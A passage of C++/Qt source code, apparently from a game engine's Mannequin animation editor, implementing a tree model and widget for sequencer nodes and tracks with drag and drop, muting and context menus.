} Qt::DropActions supportedDropActions() const override { return Qt::MoveAction; } bool canDropMimeData(const QMimeData* data, Qt::DropAction action, int row, int column, const QModelIndex& parent) const override { if (!QAbstractItemModel::canDropMimeData(data, action, row, column, parent)) { return false; } if (data->hasFormat(EditorDragDropHelpers::GetAnimationNameClipboardFormat())) { QModelIndex i = index(row, column, parent); return m_widget->IsPointValidForAnimationInContextDrop(i, data); } else if (data->hasFormat(QStringLiteral("application/x-mannequin-track-index"))) { if (!parent.parent().isValid()) { return row != -1; } return false; } return false; } bool dropMimeData(const QMimeData* data, Qt::DropAction action, int row, int column, const QModelIndex& parent) override { if (!canDropMimeData(data, action, row, column, parent)) { return false; } if (data->hasFormat(EditorDragDropHelpers::GetAnimationNameClipboardFormat())) { return m_widget->CreatePointForAnimationInContextDrop( m_widget->IsPointValidForAnimationInContextDrop( index(row, column, parent), data ), QPoint(), data ); } else if 
(data->hasFormat(QStringLiteral("application/x-mannequin-track-index"))) { QByteArray d = data->data(QStringLiteral("application/x-mannequin-track-index")); QDataStream stream(&d, QIODevice::ReadOnly); QModelIndexList indexes; while (!stream.atEnd()) { int r; quintptr id; stream >> r >> id; indexes.push_back(createIndex(r, 0, id)); } if (indexes.isEmpty()) { return false; } QModelIndex target = parent; if (row >= 0 && row < rowCount(parent)) { target = index(row, 0, parent); } m_widget->OnDragAndDrop(indexes, target); return true; } return false; } void setSequence(CSequencerSequence* seq) { beginResetModel(); m_sequence = seq; endResetModel(); } CSequencerSequence* sequence() { return m_sequence; } QModelIndex findNode(CSequencerNode* node) const { if (!m_sequence) { return QModelIndex(); } for (int row = 0; row < m_sequence->GetNodeCount(); ++row) { if (node == m_sequence->GetNode(row)) { return createIndex(row, 0, -1); } } return QModelIndex(); } QModelIndex createTrack(CSequencerNode* node, ESequencerParamType nParamId) { const QModelIndex nodeIndex = findNode(node); const int count = rowCount(nodeIndex); beginInsertRows(nodeIndex, count, count); CSequencerTrack* sequenceTrack = node->CreateTrack(nParamId); if (sequenceTrack) { sequenceTrack->OnChange(); } endInsertRows(); return index(count, 0, nodeIndex); } void setTrackVisible(CSequencerNode* node, CSequencerTrack* track, bool visible) { // nothing do do? if (visible && (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) == 0) { return; } else if (!visible && (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN)) { return; } const QModelIndex nodeIndex = findNode(node); int row = 0; CSequencerNode::SParamInfo paramInfo; for (int i = 0; i < node->GetTrackCount(); ++i) { CSequencerTrack* t = node->GetTrackByIndex(i); const ESequencerParamType type = t->GetParameterType(); if (!node->GetParamInfoFromId(type, paramInfo)) { continue; } if (t == track) { break; } if (t->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { continue; } ++row; } // change hidden flag for this track. 
if (visible) { beginInsertRows(nodeIndex, row, row); track->SetFlags(track->GetFlags() & ~CSequencerTrack::SEQUENCER_TRACK_HIDDEN); endInsertRows(); } else { beginRemoveRows(nodeIndex, row, row); track->SetFlags(track->GetFlags() | CSequencerTrack::SEQUENCER_TRACK_HIDDEN); endRemoveRows(); } } bool removeRows(int row, int count, const QModelIndex& parent = QModelIndex()) override { CSequencerNode* node = parent.data(NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index(row, 0, parent).data(TrackRole).value<CSequencerTrack*>(); if (!node || !track) { return false; } for (int r = row + count - 1; r >= row; --r) { const QModelIndex i = index(r, 0, parent); CSequencerTrack* track = i.data(TrackRole).value<CSequencerTrack*>(); if (!track) { continue; } beginRemoveRows(parent, r, r); node->RemoveTrack(track); endRemoveRows(); } return true; } int rowCount(const QModelIndex& parent) const override { if (!m_sequence) { return 0; } if (parent.isValid()) { if (parent.internalId() == -3) // extra row { return 0; } else if (parent.internalId() == -2) // root index, get number of nodes { return m_sequence->GetNodeCount(); } else if (parent.internalId() == -1) // node index, get number of tracks { int count = 0; CSequencerNode* node = m_sequence->GetNode(parent.row()); CSequencerNode::SParamInfo paramInfo; for (int i = 0; i < node->GetTrackCount(); ++i) { CSequencerTrack* track = node->GetTrackByIndex(i); if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { continue; } const ESequencerParamType type = track->GetParameterType(); if (!node->GetParamInfoFromId(type, paramInfo)) { continue; } ++count; } return count; } else { return 0; } } return 1; } int columnCount(const QModelIndex& parent) const override { Q_UNUSED(parent); return 2; } QModelIndex index(int row, int column, const QModelIndex& parent = QModelIndex()) const override { if (row < 0 || row >= rowCount(parent) || column < 0 || column >= columnCount(parent)) { return QModelIndex(); } if (!parent.isValid()) { return createIndex(row, column, row == 0 ? -2 : -3); // root index wanted } if (parent.internalId() == -1) // parent is a node index, create a track index { return createIndex(row, column, parent.row()); } else // create a node index { return createIndex(row, column, -1); } } QModelIndex parent(const QModelIndex& index) const override { if (!index.isValid()) { return QModelIndex(); } if (index.internalId() == -2 || index.internalId() == -3) // root index { return QModelIndex(); } if (index.internalId() == -1) // node index -> gets root index as parent { return createIndex(0, 0, -2); } else // track index -> gets node index as parent { return createIndex(index.internalId(), 0, -1); } } QVariant data(const QModelIndex& index, int role = Qt::DisplayRole) const override { if (!index.isValid()) { return QVariant(); } QFont font; font.setBold(true); if (!index.parent().isValid()) { if (index.row() == 0) { assert(m_sequence); switch (role) { case Qt::DisplayRole: return index.column() == 0 ? m_sequence->GetName() : QString(); case Qt::SizeHintRole: return QSize(index.column() == 0 ? 150 : 20, 24); case Qt::FontRole: return font; case Qt::TextAlignmentRole: return QVariant::fromValue<int>(Qt::AlignTop | Qt::AlignLeft); default: return QVariant(); } } else if (index.row() == 1) { // Additional empty record like space for scrollbar in key control if (role == Qt::SizeHintRole) { return QSize(index.column() == 0 ? 
150 : 20, 18); } return QVariant(); } } else if (index.internalId() == -1) // node index { CSequencerNode* node = m_sequence->GetNode(index.row()); if (index.column() == 1) { if (role == Qt::DecorationRole) { return GetIconIndexForMute(index); } } switch (role) { case Qt::DisplayRole: return index.column() == 0 ? QString::fromLatin1(node->GetName()) : QString(); case Qt::SizeHintRole: return QSize(index.column() == 0 ? 150 : 20, 16 + 2); case Qt::FontRole: return font; case Qt::TextAlignmentRole: return QVariant::fromValue<int>(Qt::AlignTop | Qt::AlignLeft); case Qt::DecorationRole: return GetIconIndexForNode(node->GetType()); case NodeRole: return QVariant::fromValue(node); default: return QVariant(); } } else // track index { CSequencerNode* node = m_sequence->GetNode(index.internalId()); CSequencerNode::SParamInfo paramInfo; int row = index.row(); for (int i = 0; i < node->GetTrackCount(); ++i) { CSequencerTrack* track = node->GetTrackByIndex(i); if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { continue; } const ESequencerParamType type = track->GetParameterType(); if (!node->GetParamInfoFromId(type, paramInfo)) { continue; } if (row-- > 0) { continue; } if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_READONLY) { node->SetReadOnly(true); } if (index.column() == 1) { if (role == Qt::DecorationRole) { if ((type == SEQUENCER_PARAM_ANIMLAYER) || (type == SEQUENCER_PARAM_PROCLAYER)) { return GetIconIndexForMute(index); } return QVariant(); } } switch (role) { case Qt::DisplayRole: return index.column() == 0 ? QString::fromLatin1(paramInfo.name) : QString(); case Qt::SizeHintRole: return QSize(index.column() == 0 ? 150 : 20, gSettings.mannequinSettings.trackSize + 2); case Qt::ForegroundRole: return QPalette().color(QPalette::Highlight); case Qt::TextAlignmentRole: return QVariant::fromValue<int>(Qt::AlignTop | Qt::AlignLeft); case Qt::DecorationRole: return GetIconIndexForParam(type); case NodeRole: return QVariant::fromValue(node); case TrackRole: return QVariant::fromValue(track); default: return QVariant(); } } } return QVariant(); } Qt::ItemFlags flags(const QModelIndex& index) const override { Qt::ItemFlags f = QAbstractItemModel::flags(index); if (!index.parent().isValid() && index.row() == 1) { f &= ~Qt::ItemIsSelectable; } CSequencerNode* node = nullptr; if (index.internalId() == -1 && (node = m_sequence->GetNode(index.row()))) { if (node->CanAddTrackForParameter(SEQUENCER_PARAM_ANIMLAYER)) { f |= Qt::ItemIsDropEnabled; } } if (index.isValid() && index.internalId() == -1) // only nodes can be moved { f |= Qt::ItemIsDragEnabled; } if (!index.parent().isValid()) { f |= Qt::ItemIsDropEnabled; } return f; } void toggleMute(const QModelIndex& index) { if (CSequencerTrack* track = index.data(TrackRole).value<CSequencerTrack*>()) { muteNodesRecursive(index, !track->IsMuted()); } else if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { muteNodesRecursive(index, !node->IsMuted()); } } void muteAllBut(const QModelIndex& index) { muteAllNodes(); muteNodesRecursive(index, false); } void muteAllNodes() { muteNodesRecursive(index(0, 0), true); } void unmuteAllNodes() { muteNodesRecursive(index(0, 0), false); } protected: void muteNodesRecursive(const QModelIndex& index, bool bMute) { if (CSequencerTrack* track = index.data(TrackRole).value<CSequencerTrack*>()) { track->Mute(bMute); emit dataChanged(index.sibling(index.row(), 0), index.sibling(index.row(), 1)); CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>(); const QModelIndex 
parent = index.parent(); CSequencerNode* parentNode = parent.data(NodeRole).value<CSequencerNode*>(); CSequencerTrack* parentTrack = parent.data(TrackRole).value<CSequencerTrack*>(); if (parentNode && !parentTrack && (parentNode == node)) { uint32 mutedAnimLayerMask; uint32 mutedProcLayerMask; generateMuteMasks(parent, mutedAnimLayerMask, mutedProcLayerMask); parentNode->UpdateMutedLayerMasks(mutedAnimLayerMask, mutedProcLayerMask); emit dataChanged(parent.sibling(parent.row(), 0), parent.sibling(parent.row(), 1)); } } else if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { node->Mute(bMute); emit dataChanged(index.sibling(index.row(), 0), index.sibling(index.row(), 1)); } int numRecords = rowCount(index); for (int i = 0; i < numRecords; ++i) { const QModelIndex& child = index.model()->index(1, 0, index); muteNodesRecursive(child, bMute); } } void generateMuteMasks(const QModelIndex& index, uint32& mutedAnimLayerMask, uint32& mutedProcLayerMask) { mutedAnimLayerMask = 0; mutedProcLayerMask = 0; uint32 animCount = 0; uint32 procCount = 0; bool bHasFragmentId = false; int numRecords = rowCount(index); for (uint32 i = 0; i < numRecords; ++i) { const QModelIndex child = index.model()->index(i, 0, index); if (CSequencerTrack* track = child.data(TrackRole).value<CSequencerTrack*>()) { switch (track->GetParameterType()) { case SEQUENCER_PARAM_FRAGMENTID: { bHasFragmentId = true; } break; case SEQUENCER_PARAM_ANIMLAYER: { if (track->IsMuted()) { mutedAnimLayerMask |= BIT(animCount); } ++animCount; } break; case SEQUENCER_PARAM_PROCLAYER: { if (track->IsMuted()) { mutedProcLayerMask |= BIT(procCount); } ++procCount; } break; default: break; } } } if (bHasFragmentId && !animCount && !procCount) { // special case: if there is a fragmentId, but no anim or proc layers // assume everything is controlled by parent state. if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { if (node->IsMuted()) { mutedAnimLayerMask = 0xFFFFFFFF; mutedProcLayerMask = 0xFFFFFFFF; } } } } QPixmap GetIconIndexForParam(ESequencerParamType type) const { return QPixmap(QStringLiteral(":/FragmentBrowser/Controls/sequencer_nodes_%1.png").arg(kIconFromParamID[type], 2, 10, QLatin1Char('0'))); } QPixmap GetIconIndexForNode(ESequencerNodeType type) const { return QPixmap(QStringLiteral(":/FragmentBrowser/Controls/sequencer_nodes_%1.png").arg(kIconFromNodeType[type], 2, 10, QLatin1Char('0'))); } QPixmap GetIconIndexForMute(const QModelIndex& index) const { int icon = MUTE_TRACK_ICON_UNMUTED; if (CSequencerTrack* track = index.data(TrackRole).value<CSequencerTrack*>()) { icon = track->IsMuted() ? MUTE_TRACK_ICON_MUTED : MUTE_TRACK_ICON_UNMUTED; } else if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { icon = node->IsMuted() ? 
MUTE_NODE_ICON_MUTED : MUTE_NODE_ICON_UNMUTED; } return QPixmap(QStringLiteral(":/FragmentBrowser/Controls/sequencer_nodes_%1.png").arg(icon, 2, 10, QLatin1Char('0'))); } private: CSequencerSequence* m_sequence; CMannNodesWidget* m_widget; }; ////////////////////////////////////////////////////////////////////////// CMannNodesWidget::CMannNodesWidget(QWidget* parent) : QTreeView(parent) , m_model(new MannNodesTreeModel(this)) { m_keysCtrl = 0; setAcceptDrops(true); setDragEnabled(true); setModel(m_model); connect(this, &QTreeView::clicked, this, &CMannNodesWidget::OnNMLclick); connect(this, &QWidget::customContextMenuRequested, this, &CMannNodesWidget::OnNMRclick); connect(this, &QTreeView::collapsed, this, &CMannNodesWidget::OnItemExpanded); connect(this, &QTreeView::expanded, this, &CMannNodesWidget::OnItemExpanded); connect(selectionModel(), &QItemSelectionModel::selectionChanged, this, &CMannNodesWidget::OnSelectionChanged); setHeaderHidden(true); header()->setSectionResizeMode(QHeaderView::Fixed); header()->resizeSection(0, 150); header()->resizeSection(1, 20); setSelectionMode(QAbstractItemView::ExtendedSelection); setContextMenuPolicy(Qt::CustomContextMenu); if (verticalScrollBar()) { connect(verticalScrollBar(), &QScrollBar::valueChanged, this, &CMannNodesWidget::OnVerticalScroll); } m_bEditLock = false; }; ////////////////////////////////////////////////////////////////////////// CMannNodesWidget::~CMannNodesWidget() { }; QModelIndexList allIndexes(const QAbstractItemModel* model, const QModelIndex& parent = QModelIndex()) { QModelIndexList result; for (int i = 0; i < model->rowCount(parent); ++i) { const QModelIndex index = model->index(i, 0, parent); result.push_back(index); result += allIndexes(model, index); } return result; }; ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SetSequence(CSequencerSequence* seq) { m_model->setSequence(seq); foreach (const QModelIndex &index, allIndexes(m_model)) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (node == nullptr || node->GetStartExpanded()) { expand(index); } } SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SetKeyListCtrl(CSequencerDopeSheetBase* keysCtrl) { m_keysCtrl = keysCtrl; //SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnItemExpanded() { SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnSelectionChanged() { m_keysCtrl->ClearSelection(); if (!m_model->sequence()) { return; } // Clear track selections. 
for (int i = 0; i < m_model->sequence()->GetNodeCount(); i++) { CSequencerNode* node = m_model->sequence()->GetNode(i); for (int t = 0; t < node->GetTrackCount(); t++) { node->GetTrackByIndex(t)->SetSelected(false); } } const QModelIndexList selection = selectionModel()->selectedRows(); for (const QModelIndex& index : selection) { CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (!track) { continue; } for (int i = 0; i < m_keysCtrl->GetCount(); i++) { if (track) { track->SetSelected(true); } if (m_keysCtrl->GetTrack(i) == track) { m_keysCtrl->SelectItem(i); break; } } } GetIEditor()->Notify(eNotify_OnUpdateSequencerKeySelection); } QModelIndexList CMannNodesWidget::expandedIndexes(const QModelIndex& parent) { QModelIndexList result; QModelIndex curIndex = parent; do { result.push_back(curIndex); curIndex = indexBelow(curIndex); } while (curIndex.isValid() && visualRect(curIndex).isValid()); return result; }; ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SyncKeyCtrl() { if (!m_keysCtrl) { return; } m_keysCtrl->ResetContent(); if (!m_model->sequence()) { return; } int nStartRow = 0; QModelIndex topRow = indexAt(rect().topLeft()); foreach (const QModelIndex&index, expandedIndexes(topRow)) { const int nItemHeight = index.data(Qt::SizeHintRole).toSize().height(); CSequencerDopeSheet::Item item; CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (track != nullptr && node != nullptr) { item = CSequencerDopeSheet::Item(nItemHeight, node, track->GetParameterType(), track); } else { item = CSequencerDopeSheet::Item(nItemHeight, node); } item.nHeight = nItemHeight; item.bSelected = false; if (track) { item.bSelected = (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_SELECTED) != 0; } m_keysCtrl->AddItem(item); } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::ExpandNode(CSequencerNode* node) { expand(m_model->findNode(node)); SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// bool CMannNodesWidget::IsNodeExpanded(CSequencerNode* node) { return isExpanded(m_model->findNode(node)); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SelectNode(const char* sName) { selectionModel()->clear(); const QModelIndex root = m_model->index(0, 0); const int count = m_model->rowCount(root); for (int i = 0; i < count; ++i) { const QModelIndex index = root.model()->index(i, 0, root); CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (node != nullptr && _stricmp(node->GetName(), sName) == 0) { setCurrentIndex(index); break; } } SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnVerticalScroll() { SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnNMLclick(const QModelIndex& index) { if (index.column() == eCOLUMN_MUTE) { m_model->toggleMute(index); RefreshTracks(); } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnNMRclick(const QPoint& point) { if (!m_model->sequence()) { return; } // Select the item that is at the point myPoint. 
const QModelIndex index = indexAt(point); CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (!node) { return; } int cmd = ShowPopupMenu(point, index); QModelIndex scrollPos = SaveVerticalScrollPos(); if (cmd >= eMenuItem_AddLayer_First && cmd < eMenuItem_AddLayer_Last) { if (node) { int paramIndex = cmd - eMenuItem_AddLayer_First; AddTrack(paramIndex, node); } } else if (cmd == eMenuItem_CreateForCurrentTags) { node->OnMenuOption(eMenuItem_CreateForCurrentTags); RefreshTracks(); } else if (cmd == eMenuItem_CopyLayer) { m_keysCtrl->CopyTrack(); } else if (cmd == eMenuItem_PasteLayer) { if (node) { PasteTrack(node); } } else if (cmd == eMenuItem_RemoveLayer) { if (node) { RemoveTrack(index); } } else if (cmd >= eMenuItem_ShowHide_First && cmd < eMenuItem_ShowHide_Last) { if (node) { ShowHideTrack(node, cmd - eMenuItem_ShowHide_First); } } else if (cmd == eMenuItem_CopySelectedKeys) { m_keysCtrl->CopyKeys(); } else if (cmd == eMenuItem_CopyKeys) { m_keysCtrl->CopyKeys(true, true, true); } else if (cmd == eMenuItem_PasteKeys) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); m_keysCtrl->PasteKeys(node, track, 0); } else if (cmd == eMenuItem_MuteNode) { m_model->toggleMute(index); RefreshTracks(); } else if (cmd == eMenuItem_SoloNode) { m_model->muteAllBut(index); RefreshTracks(); } else if (cmd == eMenuItem_MuteAll) { m_model->muteAllNodes(); RefreshTracks(); } else if (cmd == eMenuItem_UnmuteAll) { m_model->unmuteAllNodes(); RefreshTracks(); } else { if (node) { node->OnMenuOption(cmd); } } if (cmd) { RestoreVerticalScrollPos(scrollPos); SyncKeyCtrl(); } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnDragAndDrop(const QModelIndexList& pRows, const QModelIndex& target) { if (pRows.isEmpty()) { return; } bool bContainTarget = pRows.contains(target); if (target.isValid()) { QModelIndex pFirstRecordSrc = pRows.first(); QModelIndex pRecordTrg = target; if (pFirstRecordSrc.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>() && pRecordTrg.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>() && !bContainTarget) { const char* srcFirstNodeName = pFirstRecordSrc.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>()->GetName(); CAnimSequenceUndo undo(m_model->sequence(), "Reorder Node"); CSequencerNode* pTargetNode = pRecordTrg.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); for (size_t i = 0; i < pRows.count(); ++i) { QModelIndex pRecord = pRows.at(pRows.count() - i - 1); bool next = false; m_model->sequence()->ReorderNode(pRecord.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(), pTargetNode, next); } InvalidateNodes(); SelectNode(srcFirstNodeName); } else { if (pRecordTrg == m_model->index(0, 0)) { CAnimSequenceUndo undo(m_model->sequence(), "Detach Anim Node from Group"); for (size_t i = 0; i < pRows.count(); ++i) { QModelIndex pRecord = pRows.at(pRows.count() - i - 1); m_model->sequence()->ReorderNode(pRecord.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(), NULL, false); } InvalidateNodes(); } } } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::InvalidateNodes() { const QSignalBlocker sb(m_model); // do _not_ reload the model, ignore it being reset /* Notify belows informs other listeners about changes in the sequence. We already know about these changes. 
The reset is a noop in that case and will only make trouble with selection state and such. */ GetIEditor()->Notify(eNotify_OnUpdateSequencer); } ////////////////////////////////////////////////////////////////////////// bool CMannNodesWidget::GetSelectedNodes(AnimNodes& nodes) { const QModelIndexList selection = selectionModel()->selectedRows(); for (const QModelIndex& index : selection) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (node) { stl::push_back_unique(nodes, node); } } return !nodes.empty(); } ////////////////////////////////////////////////////////////////////////// bool CMannNodesWidget::HasNode(const char* name) const { if (name == NULL) { return false; } CSequencerNode* pNode = m_model->sequence()->FindNodeByName(name); if (pNode) { return true; } else { return false; } } void CMannNodesWidget::AddTrack(int paramIndex, CSequencerNode* node) { CSequencerNode::SParamInfo paramInfo; if (!node->GetParamInfo(paramIndex, paramInfo)) { return; } CAnimSequenceUndo undo(m_model->sequence(), "Add Layer"); m_model->createTrack(node, paramInfo.paramId); InvalidateNodes(); ExpandNode(node); } bool CMannNodesWidget::CanPasteTrack(CSequencerNode* node) { CClipboard clip(this); if (clip.IsEmpty()) { return false; } XmlNodeRef copyNode = clip.Get(); if (copyNode == NULL || strcmp(copyNode->getTag(), "TrackCopy")) { return false; } if (copyNode->getChildCount() < 1) { return false; } XmlNodeRef trackNode = copyNode->getChild(0); int intParamId = 0; trackNode->getAttr("paramId", intParamId); if (!intParamId) { return false; } if (!node->CanAddTrackForParameter(static_cast<ESequencerParamType>(intParamId))) { return false; } return true; } void CMannNodesWidget::PasteTrack(CSequencerNode* node) { if (!CanPasteTrack(node)) { return; } CClipboard clip(this); XmlNodeRef copyNode = clip.Get(); XmlNodeRef trackNode = copyNode->getChild(0); int intParamId = 0; trackNode->getAttr("paramId", intParamId); CAnimSequenceUndo undo(m_model->sequence(), "Paste Layer"); const QModelIndex trackIndex = m_model->createTrack(node, static_cast<ESequencerParamType>(intParamId)); CSequencerTrack* sequenceTrack = trackIndex.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (sequenceTrack) { sequenceTrack->SerializeSelection(trackNode, true, false, 0.0f); sequenceTrack->OnChange(); } InvalidateNodes(); ExpandNode(node); } void CMannNodesWidget::RemoveTrack(const QModelIndex& index) { if (QMessageBox::question(this, QString(), tr("Are you sure you want to delete this track ? 
Undo will not be available !")) == QMessageBox::Yes) { CAnimSequenceUndo undo(m_model->sequence(), "Remove Track"); m_model->removeRow(index.row(), index.parent()); InvalidateNodes(); } } void CMannNodesWidget::ShowHideTrack(CSequencerNode* node, int trackIndex) { CAnimSequenceUndo undo(m_model->sequence(), "Modify Track"); CSequencerTrack* track = node->GetTrackByIndex(trackIndex); m_model->setTrackVisible(node, track, track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN); InvalidateNodes(); } void CMannNodesWidget::RefreshTracks() { if (m_keysCtrl) { float fTime = m_keysCtrl->GetCurrTime(); if (CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CFragmentEditorPage*>()) { CMannequinDialog::GetCurrentInstance()->FragmentEditor()->SetTime(fTime); } else if (CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CPreviewerPage*>()) { CMannequinDialog::GetCurrentInstance()->Previewer()->SetTime(fTime); } else if (CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CTransitionEditorPage*>()) { CMannequinDialog::GetCurrentInstance()->TransitionEditor()->SetTime(fTime); } } InvalidateNodes(); } int CMannNodesWidget::ShowPopupMenu(const QPoint& point, const QModelIndex& index) { // Create pop up menu. switch (index.column()) { default: case eCOLUMN_NODE: { return ShowPopupMenuNode(point, index); } break; case eCOLUMN_MUTE: { return ShowPopupMenuMute(point, index); } break; } return 0; } int CMannNodesWidget::ShowPopupMenuNode(const QPoint& point, const QModelIndex& index) { QMenu menu; QMenu menuAddTrack; bool onNode = false; CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (selectionModel()->selectedRows().count() == 1) { bool notOnValidItem = !node; bool onValidItem = !notOnValidItem; onNode = onValidItem && track == NULL; bool onTrack = onValidItem && track != NULL; bool bReadOnly = false; if ((onValidItem && node->IsReadOnly()) || (onTrack && (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_READONLY) != 0)) { bReadOnly = true; } if (onValidItem) { if (onNode) { menu.addSeparator(); menu.addAction(tr("Copy Selected Keys"))->setData(eMenuItem_CopySelectedKeys); } else // On a track { menu.addAction(tr("Copy Keys"))->setData(eMenuItem_CopyKeys); } if (!bReadOnly) { menu.addAction(tr("Paste Keys"))->setData(eMenuItem_PasteKeys); if (onNode) { menu.addSeparator(); node->InsertMenuOptions(&menu); } } } // add layers submenu bool bTracksToAdd = false; if (onValidItem && !bReadOnly) { menu.addSeparator(); // List`s which tracks can be added to animation node. 
const int validParamCount = node->GetParamCount(); for (int i = 0; i < validParamCount; ++i) { CSequencerNode::SParamInfo paramInfo; if (!node->GetParamInfo(i, paramInfo)) { continue; } if (!node->CanAddTrackForParameter(paramInfo.paramId)) { continue; } menuAddTrack.addAction(paramInfo.name)->setData(eMenuItem_AddLayer_First + i); bTracksToAdd = true; } } if (!bReadOnly) { if (bTracksToAdd) { menuAddTrack.setTitle(tr("Add Layer")); menu.addMenu(&menuAddTrack); } } else { menu.addAction(tr("Create Instance for Current Tags"))->setData(eMenuItem_CreateForCurrentTags); } if (onTrack) { menu.addAction(tr("Copy Layer"))->setData(eMenuItem_CopyLayer); } if (!bReadOnly) { if (bTracksToAdd) { bool canPaste = node && CanPasteTrack(node); QAction* action = menu.addAction(tr("Paste Layer")); action->setData(eMenuItem_PasteLayer); action->setEnabled(canPaste); } if (onTrack) { // The FragmentID and TransitionProperties Layers should not be removable if (track->GetParameterType() != SEQUENCER_PARAM_FRAGMENTID && track->GetParameterType() != SEQUENCER_PARAM_TRANSITIONPROPS) { menu.addAction(tr("Remove Layer"))->setData(eMenuItem_RemoveLayer); } } } if (bTracksToAdd || onTrack) { menu.addSeparator(); } if (onValidItem) { menu.addAction(tr("%1 Tracks").arg(node->GetName()))->setEnabled(false); // Show tracks in anim node. { CSequencerNode::SParamInfo paramInfo; for (int i = 0; i < node->GetTrackCount(); i++) { CSequencerTrack* track = node->GetTrackByIndex(i); if (!node->GetParamInfoFromId(track->GetParameterType(), paramInfo)) { continue; } // change hidden flag for this track. bool checked = true; if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { checked = false; } QAction* action = menu.addAction(QString::fromLatin1(" %1").arg(paramInfo.name)); action->setCheckable(true); action->setChecked(checked); action->setData(eMenuItem_ShowHide_First + i); } } } } // track menu if (m_bEditLock) { SetPopupMenuLock(&menu); } QAction* action = menu.exec(mapToGlobal(point)); int ret = action ? action->data().toInt() : 0; if (onNode) { node->ClearMenuOptions(&menu); } return ret; } int CMannNodesWidget::ShowPopupMenuMute(const QPoint& point, const QModelIndex& index) { QMenu menu; bool onNode = false; if (selectionModel()->selectedRows().count() == 1) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); bool notOnValidItem = !node; bool onValidItem = !notOnValidItem; if (onValidItem) { if (track) { // solo not active, so mute options are available menu.addAction(tr("Mute All But This"))->setData(eMenuItem_SoloNode); menu.addSeparator(); menu.addAction(track->IsMuted() ? tr("Unmute") : tr("Mute"))->setData(eMenuItem_MuteNode); menu.addSeparator(); menu.addAction(tr("Mute All"))->setData(eMenuItem_MuteAll); menu.addAction(tr("Unmute All"))->setData(eMenuItem_UnmuteAll); } else if (node) { // solo not active, so mute options are available menu.addAction(tr("Mute All But This"))->setData(eMenuItem_SoloNode); menu.addSeparator(); menu.addAction(node->IsMuted() ? tr("Unmute") : tr("Mute"))->setData(eMenuItem_MuteNode); menu.addSeparator(); menu.addAction(tr("Mute All"))->setData(eMenuItem_MuteAll); menu.addAction(tr("Unmute All"))->setData(eMenuItem_UnmuteAll); } if (m_bEditLock) { SetPopupMenuLock(&menu); } QAction* action = menu.exec(mapToGlobal(point)); int ret = action ? 
